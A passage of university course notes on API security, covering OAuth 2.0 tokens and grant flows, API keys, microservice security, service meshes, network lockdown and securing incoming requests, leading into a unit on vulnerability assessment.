to the requested data. You grant access to your IDE, such as CodingSandbox, when you link
your GitHub account to it or import an existing repository. The Github account you are
using will send you an email confirming this.

GitHub confirmation Email

Now let’s talk about access and refresh tokens.


What is a token?
A token is a piece of data containing just enough information to be able to verify a user’s
identity or authorize them to perform a certain action.
We can comprehend access tokens and refresh tokens by using the analogy of movie
theatres. Suppose you (resource owner) wanted to watch the latest Marvel movie (Shang
Chi and the Legends of the Ten Rings), you’d go to the ticket vendor (auth server), choose
the movie, and buy the ticket(token) for that movie (scope). Ticket validity now pertains
only to a certain time frame and to a specific show. After the security guy checks your
ticket, he lets you into the theatre (resource server) and directs you to your assigned seat.
If you give your ticket to a friend, they can use it to watch the movie. An OAuth access
token works the same way. Anyone who has the access token can use it to make API
requests. Therefore, they’re called “Bearer Tokens”. You will not find your personal
information on the ticket. Similarly, OAuth access tokens can be created without actually
including information about the user to whom they were issued. Like a movie ticket, an
OAuth access token is valid for a certain period and then expires. Security personnel
usually ask for ID proof to verify your age, especially for A-rated movies. Bookings made
online will be authenticated by the app before tickets are provided to you.
So, Access tokens are credentials used to access protected resources. Each token represents
the scope and duration of access granted by the resource owner and enforced by the
authorization server. The format, structure, and method of utilizing access tokens can be
different depending on the resource server’s security needs.
A decoded access token, that follows a JWT format.
{ "iss": "https://YOUR_DOMAIN/",

DEPARTMENT OF AI&DS Page 31


"sub": "auth0|123456",
"aud": [ "my-api-identifier", "https://YOUR_DOMAIN/userinfo"
],
"azp": "YOUR_CLIENT_ID", "exp": 1474178924, "iat": 1474173924,
"scope": "openid profile email address phone read:meetings" }
Now that your showtime has expired and you want to watch another movie, you need to
buy a new ticket. Upon your last purchase, you received a Gift card that is valid for three
months. You can use this card to purchase a new ticket. In this scenario, the gift card is
analogous to Refresh Tokens. A Refresh token is a string issued to the client by the
authorization server and is used to obtain a new access token when the current access token
becomes invalid.
They do not refresh an existing access token, they simply request a new one. The expiration
time for refresh tokens tends to be much longer than for access tokens. In our case, the gift
card is valid for three months, while the ticket is valid for two hours. Unlike the original
access token, it contains less information.
Let us now look at how OAuth works when uploading a picture to a photo editor to
understand the workflow.
1. The resource owner or user wishes to resize the image, so he goes to the editor
(client), tells the client that the image is in Google Drive (resource owner),
asking the client to bring it for editing.
2. The client sends a request to the authorization server to access the image. The
server asks the user to grant permissions for the same.
3. Once the user allows third-party access and logs into the website using Google,
the authorization server sends a short-lived authorization code to the client.
4. Clients exchange auth codes for access tokens, which define the scope and
duration of user access.
5. The Authorization Server validates the access token, and the editor fetches the
image that the user wants to edit from their Google Drive account.
An overview of the OAuth workflow

1. Authorization Code Flow:

DEPARTMENT OF AI&DS Page 32


Authorization code flow
1. The client requests authorization by directing the resource owner to the
authorization server.
2. The authorization server authenticates the resource owner and informs the user
about the client and the data requested by the client. Clients cannot access user
credentials since authentication is performed by the authentication server.
3. Once the user grants permission to access the protected data, the
authorization server redirects the user to the client with the temporary
authorization code.
4. The client requests an access token in exchange for the authorization code.
5. The authorization server authenticates the client, verifies the code, and will
issue an access token to the client.
6. Now the client can access protected resources by presenting the access token
to the resource server.
7. If the access token is valid, the resource server returns the requested
resources to the client.

2. Implicit Flow :

Implicit Grant flow is an authorization flow for browser-based apps. Implicit Grant Type
was designed for single-page JavaScript applications for getting access tokens without an
intermediate code exchange step. Single-page applications are those in which the page does
not reload and the required contents are dynamically loaded.
Take Facebook or Instagram, for instance. Instagram doesn’t require you to reload your
application to see the comments on your post. Updates occur without reloading the page.
Implicit grant flow is thus applicable in such applications.
The implicit flow issues an access token directly to the client instead of issuing an
authorization code.
The Implicit Grant:
 Constructs a link and the redirection of the user’s browser to that URL.

DEPARTMENT OF AI&DS Page 33


https://example-app.com/redirect
#access_token=g0ZGZmPj4nOWIlTTk3Pw1Tk4ZTKyZGI3 &token_type=Bearer
&expires_in=400 &state=xcoVv98y3kd55vuzwwe3kcq
 If the user accepts the request, the authorization server will return the
browser to the redirect URL supplied by the Client Application with a token
and state appended to the fragment part of the URL. (A state is a string of
unique and non-predictable characters.)
 To prevent cross-site forging attacks, the application should test the incoming
state value against the value that was originally set, once a redirect is initiated.
(We are a target of an attack if we receive a response with a state that does not
match).
 The redirection URI includes the access token, which is sent to the client.
Clients now have access to the resources granted by resource owners.
This flow is deprecated due to the lack of client authentication. A malicious application can
pretend to be the client if it obtains the client credentials, which are visible if one inspects
the source code of the page, and this leaves the owner vulnerable to phishing attacks.
There is no secure backchannel like an intermediate authorization code – all communication
is carried out via browser redirects in implicit grant processing. To mitigate the risk of the
access token being exposed to potential attacks, most servers issue short-lived access
tokens.

3. Resource owner password credentials flow:

In this flow, the owner’s credentials, such as username and password, are exchanged for an
access token. The user gives the app their credentials directly, and the app then utilizes
those credentials to get an access token from a service.
1. Client applications ask the user for credentials.
2. The client sends a request to the authorization server to obtain the access token.
3. The authorization server authenticates the client, determines if it is
authorized to make this request, and verifies the user’s credentials. It
returns an access token if everything is verified successfully.
4. The OAuth client makes an API call to the resource server using the
access token to access the protected data.
5. The resource server grants access.
The Microsoft identity platform, for example, supports the resource owner password
credentials flow, which enables applications to sign in users by directly using their
credentials.
It is appropriate for resource owners with a trusted relationship with their clients. It is not
recommended for third-party applications that are not officially released by the API
provider.

Why Resource Owner Password Credentials Grant Type is not recommended?

DEPARTMENT OF AI&DS Page 34


1. Impersonation: Someone may pose as the user to request the resource, so there is
no way to verify that the owner made the request.
2. Phishing Attacks – A random client application asks the user for credentials.
Instead of redirecting you to your Google account when an application
requests your Google username and password.
3. The user’s credentials could be leaked maliciously to an attacker.
4. A client application can request any scope it desires from the authorization server.
Despite controlled scopes, a client application may be able to access user
resources without the user’s permission.
For example, in 2017, a fake Google Docs application was used to fool users into thinking
it was a legitimate product offered by Google. The attackers used this app to access users’
email accounts by abusing the OAuth token.

4. Client Credentials Flow:

The Client credentials flow permits a client service to use its own credentials, instead of
impersonating a user to access the protected data. In this case, authorization scope is
limited to client-controlled protected resources.
1. The client application makes an authorization request to the Authorization Server
using its client credentials.
2. If the credentials are accurate, the server responds with an access token.
3. The app uses the access token to make requests to the resource server.
4. The resource server validates the token before responding to the request.

OAuth 2.0 vs OAuth 1. 0

The versions of OAuth are not compatible, as OAuth 2.0 is a complete overhaul of OAuth 1.0.
Implementing OAuth 2.0 is easier and faster. OAuth 1.0 had complicated cryptographic
requirements, supported only three flows, and was not scalable.
Now that you know what happens behind the scenes when you forget your Facebook
password, and it verifies you through your Google account and allows you to change it,
or whenever any other app redirects you to your Google account, you will have a better
understanding of how it works.

OAuth 2.0 (OAuth2) is an open standard and protocol designed for secure authorization and
access delegation. It provides a way for applications to access the resources of a user
(resource owner) on a server (resource server) without exposing the user's credentials to the
application. Instead, OAuth2 uses access tokens to represent the user's authorization,
allowing controlled access to protected resources.

Here is a brief explanation of the main components and flow of OAuth2:

Key Components:

1. Resource Owner (User):

DEPARTMENT OF AI&DS Page 35


 The entity that owns the resource and has the ability to grant access to it.
2. Client (Application):
 The application or service that wants to access the user's resources.
3. Authorization Server:
 Responsible for authenticating the user and issuing access tokens after the user
grants authorization.
4. Resource Server:
 Hosts the protected resources that the client wants to access on behalf of the
user.

OAuth2 Flow:

1. Client Registration:
 The client registers with the authorization server, obtaining a client ID and,
optionally, a client secret.
2. Authorization Request:
 The client initiates the authorization process by redirecting the user to the
authorization server's authorization endpoint, including its client ID,
requested
scope, and a redirect URI.
3. User Authorization:
 The resource owner (user) interacts with the authorization server to grant or
deny access. If granted, the authorization server redirects the user back to the
client
with an authorization code.
4. Token Request:
 The client sends a token request to the authorization server, including the
authorization code received in the previous step, along with its client
credentials
(client ID and secret). In response, the authorization server issues an access
token.
5. Access Protected Resource:
 The client uses the access token to access the protected resources on the
resource server. The token acts as proof of the user's permission.

Grant Types:

OAuth2 supports different grant types, including:

 Authorization Code Grant


 Implicit Grant
 Resource Owner Password Credentials Grant
 Client Credentials Grant

Each grant type is suitable for different use cases and security requirements.

OAuth2 is widely used in scenarios where secure and controlled access to user resources is
required, such as third-party application integrations, mobile app access, and delegated
authorization in distributed systems. It separates the roles of resource owner, client, authorization
server, and resource server to enhance security and user privacy.

DEPARTMENT OF AI&DS Page 36


DEPARTMENT OF AI&DS Page 37
Difference
After going through these differences we can easily understand the difference between API
Key and OAuth. There are three types of security mechanism for an API –

1. HTTP Basic Authentication: In this mechanism HTTP User Agent provides a


Username and Password. Since this method depends only on HTTP Header and
entire authentication data is transmitted on insecure lines, Thus, it is prone to
Man-In-The-Middle Attack where a user can simply capture the HTTP Header
and login using copy-cat Header and a malicious packet. Due to enforced SSL,
this scheme is very slow. HTTP Basic Authentication can be used in situations
like Internal Network where speed is not an issue.
2. API Keys: API Keys came into picture due to slow speed and highly vulnerable
nature of HTTP Basic Authentication. API Key is the code that is assigned to the
user upon API Registration or Account Creation. API Keys are generated using
the specific set of rules laid down by the authorities involved in API
Development. This piece of code is required to pass whenever the entity
(Developer, user or a specific program) makes a call to the API. Despite easy
usage and fast speed, they are highly insecure.

Question still remains, WHY ??


The problem is, API Key is a method of Authentication, not Authorization.
They are like username and password, Thus providing entry into the system. In
general, API Keys are placed at the following places: Authorization Header,
Basic Auth, Body Data, Custom Header, Query String.
Anytime while making a request we need to send an API Key by placing it in any
of the above places. Thus if at any point of time network is compromised, then the
entire network gets exposed and API Key can be easily extracted.
Once an API Key is stolen, it can be used for indefinite amount of time. Unless
and until the project owner revokes the API Key and generate a new one.
3. OAuth: OAuth is not only a method of Authentication or Authorization, but it’s
also a mixture of both the methods. Whenever an API is called using OAuth
credential, user logs into the system, generating a token. Remember this token is
active for one session only after which user has to generate a new token by
logging again into the system. After submitting this token to the Server, User is
authorized to the roles based on the credentials.
Securing Microservice APIs
Micro-Service is a very small or even micro-independent process that communicates
and return message through mechanisms like Thrift, HTTPS,

DEPARTMENT OF AI&DS Page 38


and REST API. Basically, micro-services architecture is the combination of lots of small
processes which combine and form an application. In micro-services architecture, each
process is represented by multiple containers. Each individual service is designed for a
specific function and all services together build an application.
Now let’s discuss the actual point of security in micro-service architecture, nowadays
many applications use external services to build their application and with the greater
demand, there is a need for quality software development and architecture design.
Systems administrators, database administrators, cloud solution providers, and API gateway
these are the basic services used by the application.
Security of micro-services mainly focuses on designing secure communication between all
the services which are implemented by the application.
How To Secure Micro-services :
(1) Password Complexity :
Password complexity is a very important part as a security feature is a concern. The
mechanism implemented by the developer must be able to enforce the user to create a
strong password during the creation of an account. All the password characters must be
checked to avoid the combination of weak passwords containing only strings or numbers.
(2) Authentication Mechanism :
Sometimes authentication is not considered a high priority during the implementation of
security features. It’s important to lock users’ accounts after a few numbers of fail login
attempts. On login there must be rate-limiting is implemented to avoid the brute force
attack. if the application is using any external service all APIs must be implemented with
an authentication token to avoid interfering with the user in API endpoint communication.
Use multi-factor authentication in micro-services to avoid username enumeration during
login and password reset.
(3) Authentication Between Two Services :
The man-in-the-middle attack is may happen during encounters during the service- to-
service communication. Always use HTTPS instead of HTTP, HTTPS always ensures the
data encryption between two services and also provides additional protection against
penetration of external entities on the traffic between client- server.
It is difficult to manage SSL certificates on servers in multi-machine scenarios, and it is
very complex to issue certificates on every device. There is a secure solution HMAC is
available over HTTPS. HMAC consists of a hash-based messaging code to sign the
request.
(4) Securing Rest Data :
It is very important to secure the data which not currently in use. If the environment is
secure, the network is secure then we think that attackers can not reach stored data, but
this is not case there are many examples of data breaches in the protected system only due
to weak protection mechanisms on data security. All the endpoints of where data is stored
must be non-public. Also, during development take care of the API key. All the API keys
must be secret leakage of private API also leads to

DEPARTMENT OF AI&DS Page 39


exposure of sensitive data in public. Don’t expose any sensitive data, or endpoints in
the source code.
(5) Penetration Testing :
It is always good practice to consider security features in the software development life
cycle itself. but in general, this is not always true, considering this problem is always
important to do penetration testing on the application after the final release. There are
some important attack vectors released by OWASP always try these attacks during the
penetrating testing of the application. Some of the important attack vectors are mentioned
below.
 SQL Injection.
 Cross-Site Scripting (XSS).
 Sensitive Information Disclosure.
 Broken Authentication and Authorization.
 Broken Access Control.
Unlock the Power of Placement Preparation!
Feeling lost in OS, DBMS, CN, SQL, and DSA chaos? Our Complete Interview
Preparation Course is the ultimate guide to conquer placements. Trusted by over
100,000+ geeks, this course is your roadmap to interview triumph.

Definition: Securing Microservice APIs is the process of implementing security


measures to safeguard the communication channels and data exchanged between individual
microservices in a microservices architecture. This includes authentication, authorization,
encryption, and other practices to protect against potential vulnerabilities and unauthorized
access.

Explanation: In a microservices architecture, software is divided into small,


independently deployable services that work together to form a larger application. Each
microservice typically exposes an API, allowing other services to interact with it. Securing
these APIs is crucial to maintaining the overall security and integrity of the
system. Here are key aspects of securing microservice APIs:

1. Authentication:
 Ensure that each microservice authenticates itself before communicating with
other services. This can involve the use of API keys,
tokens, or other authentication mechanisms.
2. Authorization:
 Implement fine-grained access controls to specify what actions each
microservice can perform. This helps prevent unauthorized access to
sensitive resources.
3. Encryption (In Transit and At Rest):
 Use secure communication protocols such as HTTPS to encrypt data in
transit between microservices. Additionally, consider encrypting data at rest to
protect it when stored in databases or other storage systems.
4. API Gateways:

DEPARTMENT OF AI&DS Page 40


 Introduce an API gateway to centralize security controls, manage access, and
enforce policies across microservices. The API gateway can handle
authentication, rate limiting, and other security-related tasks.
5. Token Management:
 If using tokens for authentication, implement secure token management
practices. Use short-lived tokens and consider token revocation
mechanisms.
6. Logging and Monitoring:
 Implement comprehensive logging to track and monitor API usage. Set up
alerting systems to detect and respond to potential security incidents.
7. Service Mesh for Communication Security:
 Consider using a service mesh for managing communication between
microservices. A service mesh can provide features like mutual TLS,
service identity, and secure communication channels.
8. Container Security:
 Apply security best practices to containers. Regularly update container
images, scan for vulnerabilities, and enforce security policies.
9. Secure Coding Practices:
 Train developers in secure coding practices to write resilient and secure code.
Address common security vulnerabilities such as injection attacks and input
validation issues.
10. Dependency Scanning:
 Regularly scan dependencies for known vulnerabilities. Use tools and
services that automatically check for and alert about vulnerable
dependencies.
11. Regular Security Audits:
 Conduct regular security audits and code reviews to identify and address
potential vulnerabilities. Stay informed about security best practices and
address emerging threats promptly.

Service Mesh

What is a service mesh?

A service mesh is a software layer that handles all communication between services in
applications. This layer is composed of containerized microservices. As applications scale
and the number of microservices increases, it becomes challenging to monitor the
performance of the services. To manage connections between services, a service mesh
provides new features like monitoring, logging, tracing, and traffic control. It’s independent
of each service’s code, which allows it to work across network boundaries and with multiple
service management systems.

DEPARTMENT OF AI&DS Page 41


Why do you need a service mesh?

In modern application architecture, you can build applications as a collection of small,


independently deployable microservices. Different teams may build individual microservices
and choose their coding languages and tools. However, the microservices must communicate
for the application code to work correctly.

Application performance depends on the speed and resiliency of communication between


services. Developers must monitor and optimize the application across services, but it’s hard
to gain visibility due to the system's distributed nature. As applications scale, it becomes even
more complex to manage communications.

There are two main drivers to service mesh adoption, which we detail next.

Read about microservices »

Service-level observability

As more workloads and services are deployed, developers find it challenging to understand
how everything works together. For example, service teams want to know what their
downstream and upstream dependencies are. They want greater visibility into how services and
workloads communicate at the application layer.

Service-level control

Administrators want to control which services talk to one another and what actions they
perform. They want fine-grained control and governance over the behavior, policies, and
interactions of services within a microservices architecture. Enforcing security policies is
essential for regulatory compliance.

What are the benefits of a service mesh?

A service mesh provides a centralized, dedicated infrastructure layer that handles the
intricacies of service-to-service communication within a distributed application. Next, we
give several service mesh benefits.

Service discovery

Service meshes provide automated service discovery, which reduces the operational load of
managing service endpoints. They use a service registry to dynamically discover and keep
track of all services within the mesh. Services can find and communicate with each other
seamlessly, regardless of their location or underlying infrastructure. You can quickly scale by
deploying new services as required.

Load balancing

Service meshes use various algorithms—such as round-robin, least connections, or weighted


load balancing—to distribute requests across multiple service instances intelligently. Load
balancing improves resource utilization and ensures high availability and scalability. You
can optimize performance and prevent network communication bottlenecks.

Traffic management

DEPARTMENT OF AI&DS Page 42


Service meshes offer advanced traffic management features, which provide fine-grained
control over request routing and traffic behavior. Here are a few examples.

Traffic splitting

You can divide incoming traffic between different service versions or configurations. The mesh
directs some traffic to the updated version, which allows for a controlled and gradual rollout of
changes. This provides a smooth transition and minimizes the impact of changes.

Request mirroring

You can duplicate traffic to a test or monitoring service for analysis without impacting the
primary request flow. When you mirror requests, you gain insights into how the service
handles particular requests without affecting the production traffic.

Canary deployments

You can direct a small subset of users or traffic to a new service version, while most users
continue to use the existing stable version. With limited exposure, you can experiment with
the new version's behavior and performance in a real-world environment.

Security

Service meshes provide secure communication features such as mutual TLS (mTLS)
encryption, authentication, and authorization. Mutual TLS enables identity verification in
service-to-service communication. It helps ensure data confidentiality and integrity by
encrypting traffic. You can also enforce authorization policies to control which services
access specific endpoints or perform specific actions.

Monitoring

Service meshes offer comprehensive monitoring and observability features to gain insights
into your services' health, performance, and behavior. Monitoring also supports
troubleshooting and performance optimization. Here are examples of monitoring features
you can use:

 Collect metrics like latency, error rates, and resource utilization to analyze overall
system performance
 Perform distributed tracing to see requests' complete path and timing across
multiple services
 Capture service events in logs for auditing, debugging, and compliance purposes

How does a service mesh work?


A service mesh removes the logic governing service-to-service communication from individual
services and abstracts communication to its own infrastructure layer. It uses several network
proxies to route and track communication between services.

A proxy acts as an intermediary gateway between your organization’s network and the
microservice. All traffic to and from the service is routed through the proxy server. Individual
proxies are sometimes called sidecars, because they run separately but are logically next to
each service. Taken together, the proxies form the service mesh layer.

DEPARTMENT OF AI&DS Page 43


There are two main components in service mesh architecture—the control plane and the data
plane.

Data plane
The data plane is the data handling component of a service mesh. It includes all the sidecar
proxies and their functions. When a service wants to communicate with another service, the
sidecar proxy takes these actions:

1. The sidecar intercepts the request


2. It encapsulates the request in a separate network connection
3. It establishes a secure and encrypted channel between the source and destination
proxies

The sidecar proxies handle low-level messaging between services. They also implement
features, like circuit breaking and request retries, to enhance resiliency and prevent service
degradation. Service mesh functionality—like load balancing, service discovery, and traffic
routing—is implemented in the data plane.

Control plane
The control plane acts as the central management and configuration layer of the service mesh.

With the control plane, administrators can define and configure the services within the mesh. For
example, they can specify parameters like service endpoints, routing rules, load balancing
policies, and security settings. Once the configuration is defined, the control plane distributes the
necessary information to the service mesh's data plane.

The proxies use the configuration information to decide how to handle incoming requests. They
can also receive configuration changes and adapt their behavior dynamically. You can make
real-time changes to the service mesh configuration without service restarts or disruptions.

Service mesh implementations typically include the following capabilities in the control plane:

 Service registry that keeps track of all services within the mesh
 Automatic discovery of new services and removal of inactive services
 Collection and aggregation of telemetry data like metrics, logs, and distributed tracing
information

DEPARTMENT OF AI&DS Page 44


DEPARTMENT OF AI&DS Page 45
What is Istio?

Istio is an open-source service mesh project designed to work primarily with Kubernetes.
Kubernetes is an open-source container orchestration platform used to deploy and manage
containerized applications at scale.

Istio’s control plane components run as Kubernetes workloads themselves. It uses a


Kubernetes Pod—a tightly coupled set of containers that share one IP address—as the basis
for the sidecar proxy design.

Istio’s layer 7 proxy runs as another container in the same network context as the main
service. From that position, it can intercept, inspect, and manipulate all network traffic
heading through the Pod. Yet, the primary container needs no alteration or even knowledge
that this is happening.

Read about Kubernetes »

What are the challenges of open-source service mesh implementations?


Here are some common service mesh challenges associated with open-source platforms like
Istio, Linkerd, and Consul.

Complexity
Service meshes introduce additional infrastructure components, configuration requirements, and
deployment considerations. They have a steep learning curve, which requires developers and
operators to gain expertise in using the specific service mesh implementation. It takes time and
resources to train teams. An organization must ensure teams have the necessary knowledge to
understand the intricacies of service mesh architecture and configure it effectively.

Operational overheads
Service meshes introduce additional overheads to deploy, manage, and monitor the data plane
proxies and control plane components. For instance, you have to do the following:

DEPARTMENT OF AI&DS Page 46


 Ensure high availability and scalability of the service mesh infrastructure
 Monitor the health and performance of the proxies
 Handle upgrades and compatibility issues

It's essential to carefully design and configure the service mesh to minimize any performance
impact on the overall system.

Integration challenges

A service mesh must integrate seamlessly with existing infrastructure to perform its require
functions. This includes container orchestration platforms, networking solutions, and other tools
in the technology stack.

It can be challenging to ensure compatibility and smooth integration with other components in
complex and diverse environments. Ongoing planning and testing are required to change your
APIs, configuration formats, and dependencies. The same is true if you need to upgrade to new
versions anywhere in the stack.

Locking Down Network Connections


Locking down network connections is a critical aspect of securing computer systems and
preventing unauthorized access or malicious activities. This process involves implementing
various measures to control and restrict network communication. Here are key considerations
and practices for locking down network connections:

1. Firewalls:
 Definition: Firewalls are network security devices that monitor and control
incoming and outgoing network traffic based on predetermined security
rules.
 Implementation:
 Use both hardware and software firewalls.
 Configure firewalls to allow only necessary traffic and block all
other incoming and outgoing connections.
 Regularly review and update firewall rules.
2. Network Segmentation:
 Definition: Network segmentation involves dividing a network into isolated
segments to control the flow of traffic and limit the potential impact of a
security breach.
 Implementation:
 Implement VLANs (Virtual Local Area Networks) to segment traffic.
 Isolate critical infrastructure from less secure areas.
 Use separate subnets for different parts of the network.
3. Intrusion Detection and Prevention Systems (IDPS):
 Definition: IDPS monitors network or system activities for malicious
exploits or security policy violations.
 Implementation:
 Deploy IDPS to detect and respond to suspicious activities.
 Set up alerts and notifications for potential security incidents.
4. Access Control Lists (ACLs):
 Definition: ACLs are rules that specify which users or system processes
are granted access to objects, as well as what operations are allowed on
given objects.

DEPARTMENT OF AI&DS Page 47


 Implementation:
 Use ACLs to control access at the network level.
 Specify allowed and denied IP addresses, protocols, and ports.
5. VPN (Virtual Private Network)
Security:
 Definition: VPNs provide a secure way to connect to a private network over
the
internet.
 Implementation:
 Use strong encryption for VPN connections.
 Implement multi-factor authentication for VPN access.
 Regularly update and patch VPN software.
6. Port Security:
 Definition: Port security involves controlling access to physical network ports
on
switches.
 Implementation:
 Disable unused physical ports on network devices.
 Implement MAC address filtering to allow only authorized devices.
7. Network Access Control
(NAC):
 Definition: NAC is a security approach that enforces policies to control access
to
networks.
 Implementation:
 Use NAC solutions to assess the security posture of devices
before granting network access.
 Enforce compliance with security policies.
8. Secure Protocols:
 Definition: Use secure communication protocols to protect data in transit.
 Implementation:
 Use HTTPS instead of HTTP for web traffic.
 Avoid outdated and insecure protocols.
9. Monitoring and Logging:
 Definition: Regularly monitoring network traffic and maintaining logs helps
detect and respond to security incidents.
 Implementation:
 Implement network monitoring tools.
 Analyze logs for unusual patterns or suspicious activities.
10. Regular Updates and Patching:
 Definition: Keeping network devices and software up to date helps address
known vulnerabilities.
 Implementation:
 Establish a patch management process.
 Regularly update firmware, operating systems, and software.
11. Employee Training:
 Definition: Educate employees about security best practices and the
importance
of adhering to network security policies.
 Implementation:
 Conduct regular security awareness training.
 Emphasize the risks of unauthorized access and social
engineering attacks.
DEPARTMENT OF AI&DS Page 48
By implementing these measures, organizations can significantly enhance the security of
their network connections and reduce the risk of unauthorized access, data breaches, and
other security incidents. Regular security assessments and audits are also essential to ensure
ongoing network security.
Definition: Locking down network connections refers to the implementation of
security measures and access controls to restrict and control the flow of data between
devices on a network. This practice aims to enhance the security of networked systems by
preventing unauthorized access, minimizing attack surfaces, and protecting sensitive
information from unauthorized interception or manipulation.

Explanation: Securing network connections involves implementing a combination of


technological, procedural, and policy-based controls to ensure that only authorized entities
have access to specific resources and services within a network. This can include measures
such as firewalls, access control lists (ACLs), network segmentation, and encryption to
safeguard the confidentiality, integrity, and availability of data.

Types of Locking Down Network Connections:

1. Firewall Rules:
 Configuring rules within firewalls to control traffic based on source,
destination, port, and protocol.
2. Access Control Lists (ACLs):
 Implementing ACLs on routers and switches to control access to
network resources based on IP addresses and other criteria.
3. Network Segmentation:
 Dividing the network into segments or VLANs to limit communication
between different parts of the infrastructure.
4. Intrusion Prevention Systems (IPS):
 Deploying systems that actively monitor network traffic to detect and
prevent malicious activities.
5. Virtual Private Networks (VPNs):
 Establishing secure, encrypted communication channels for remote
access or communication between geographically distributed networks.
6. Port Security:
 Controlling physical access to network ports on switches to prevent
unauthorized devices from connecting.
7. Network Access Control (NAC):
 Enforcing security policies to control and manage devices attempting to
connect to the network.

Characteristics of Locking Down Network Connections:

1. Granular Control:

DEPARTMENT OF AI&DS Page 49


 Provides fine-grained control over who can access specific network
resources and services.
2. Layered Defense:
 Utilizes multiple layers of security measures to create a robust defense
against various threats.
3. Adaptability:
 Can be adapted to the specific needs and requirements of different
organizations and network architectures.

Advantages:

1. Security Enhancement:
 Enhances overall network security by restricting unauthorized access.
2. Risk Reduction:
 Reduces the risk of data breaches, unauthorized intrusions, and other
security incidents.
3. Compliance:
 Helps organizations comply with industry regulations and data
protection standards.
4. Control Over Traffic:
 Provides administrators with control over the flow of network traffic,
allowing for better management.

Disadvantages:

1. Complexity:
 Implementing and managing robust network security measures can
introduce complexity.
2. Operational Overhead:
 Requires ongoing monitoring, maintenance, and updates, adding to
operational overhead.

Needs for Locking Down Network Connections:

1. Protection Against Unauthorized Access:


 To prevent unauthorized individuals or entities from accessing sensitive
network resources.
2. Data Confidentiality:
 To protect sensitive data from interception or unauthorized viewing.
3. Regulatory Compliance:
 To comply with industry-specific regulations and data protection laws.
4. Preservation of Network Integrity:

DEPARTMENT OF AI&DS Page 50


 To ensure the integrity and reliability of networked systems and
services.

Uses:

1. Enterprise Networks:
 Locking down network connections is crucial for securing internal
corporate networks.
2. Cloud Environments:
 Essential for securing communication between services and resources in
cloud-based infrastructures.
3. Critical Infrastructure:
 Protects communication networks in critical infrastructure sectors such
as energy, transportation, and healthcare.
4. E-commerce and Financial Services:
 Critical for securing online transactions and financial data.

Securing Incoming Requests

In summary, locking down network connections is a fundamental practice in cybersecurity,


aiming to create a secure and controlled network environment. It involves a combination of
technical controls, policies, and ongoing monitoring to
mitigate risks and protect sensitive information.
Definition: Securing incoming requests refers to the process of implementing
measures to protect web applications or services from potential security threats posed by data
sent from external sources. This includes validating and filtering incoming data to ensure
that it meets specific security criteria, preventing common vulnerabilities and unauthorized
access attempts.

Explanation: Securing incoming requests is crucial for maintaining the integrity and
confidentiality of web applications. It involves implementing a variety of security
mechanisms and best practices to validate and sanitize user input, authenticate and authorize
users, encrypt data in transit, and protect against various types of attacks such as SQL
injection, cross-site scripting (XSS), and more.

Types of Mechanisms for Securing Incoming Requests:

1. Input Validation:
 Checking and validating user input to ensure it adheres to expected
formats and does not contain malicious code.
2. Authentication:

DEPARTMENT OF AI&DS Page 51


 Verifying the identity of users before granting access to protected
resources.
3. Authorization:
 Controlling and granting access to specific functionalities or resources based
on the user's privileges.
4. Encryption:
 Securing data in transit by using encryption protocols such as HTTPS to
prevent eavesdropping and data tampering.
5. Rate Limiting:
 Restricting the number of requests a user or IP address can make within a
defined time period to prevent abuse and denial-of-service attacks.
6. Web Application Firewall (WAF):
 Implementing a firewall designed specifically for web applications to filter
and block malicious traffic.
7. Content Security Policy (CSP):
 Defining and enforcing policies to control the sources from which
certain types of content can be loaded.
8. Cross-Origin Resource Sharing (CORS):
 Regulating which domains are permitted to make requests to a web
application.
9. Security Headers:
 Setting HTTP headers to enhance security, including headers like HTTP
Strict Transport Security (HSTS) and X-Content-Type-Options.
10. File Upload Security:
 Validating and securing file uploads to prevent malicious files or
content from being processed.
11. Session Management:
 Safeguarding user sessions through secure session identifiers, session
timeouts, and secure cookie attributes.
12. Monitoring and Logging:
 Implementing robust monitoring and logging mechanisms to detect and
respond to security incidents.

Characteristics:

1. Proactive Defense:
 Involves implementing measures to proactively defend against
potential security threats rather than reacting to incidents.
2. Layered Security:
 Typically involves the implementation of multiple security layers to
create a comprehensive defense strategy.
3. Continuous Improvement:
 Requires continuous monitoring and updates to adapt to emerging
security threats.

Advantages:

DEPARTMENT OF AI&DS Page 52


1. Prevention of Attacks:
 Effectively prevents common web application attacks, such as SQL
injection, XSS, and CSRF.
2. Data Integrity:
 Ensures the integrity of data by preventing unauthorized modifications
or tampering.
3. User Privacy:
 Protects user privacy by securing sensitive information from
unauthorized access.
4. Regulatory Compliance:
 Helps in meeting regulatory requirements related to data protection and
user privacy.

Disadvantages:

1. Complexity:
 Implementing and managing a comprehensive security strategy can
introduce complexity.
2. Performance Impact:
 Some security mechanisms, such as encryption, may introduce a
performance overhead.

Uses:

1. Web Applications:
 Essential for securing web applications, particularly those dealing with
sensitive data or user accounts.
2. APIs (Application Programming Interfaces):
 Critical for securing APIs to prevent unauthorized access and data
breaches.
3. Online Services:
 Used in online services, including e-commerce platforms, banking
websites, and social media networks.
4. Cloud Environments:
 Important for securing applications and services hosted in cloud
environments.
5. Critical Infrastructure:
 Deployed in critical infrastructure systems to protect against cyber
threats.

In summary, securing incoming requests is fundamental to maintaining the security


and trustworthiness of web applications and services. It involves a combination of
preventive measures, monitoring, and continuous improvement to stay ahead of
evolving security threats.

DEPARTMENT OF AI&DS Page 53


UNIT IV VULNERABILITY ASSESSMENT AND
PENETRATION TESTING
Vulnerability Assessment Lifecycle:
As stated in the introduction, risk and vulnerability assessments are vital
building blocks in your integrated risk management program. Let’s make it clear
and show how these two concepts are linked
Vulnerability assessment or vulnerability analysis is a series of activities a
company should perform regularly to identify, quantify, and prioritize the risks
and vulnerabilities in order to keep its information security posture effective
Risk assessment identifies recognized threats, threat actors, and the probability
that these factors will result in an exposure or loss. In simple words, risk
assessment is a process of looking for bad things that can happen, who can
cause them, and what will their impact be on important pieces of the
company’s information if they rise up
Vulnerability and risk assessments represent, respectively, step 2 and step 3 in
the vulnerability management life cycle
Vulnerability management life cycle starts by defining the effectiveness of the
current security policies and procedures. If a company has already set up an
information security management system, it is important to establish any risks
that may be associated with the implementation of current security procedures
and what may have been overlooked.

DEPARTMENT OF AI&DS
Try to see what the organization looks like from an outsider’s perspective, as
well as from an insider’s standpoint. Work with management to set goals with
start dates and end dates. Determine which systems to begin with, set up
testing standards, get approval in writing form, and keep management
informed on the progress: what you are doing, how you will do it, and the
timing for each phase of the project. The following steps describe the
vulnerability management life cycle that security professionals use to find and
remediate security weakness before any attack and/ or implement security
controls
Creating Baseline
In this phase,the following activities take place:defining the effectiveness of the
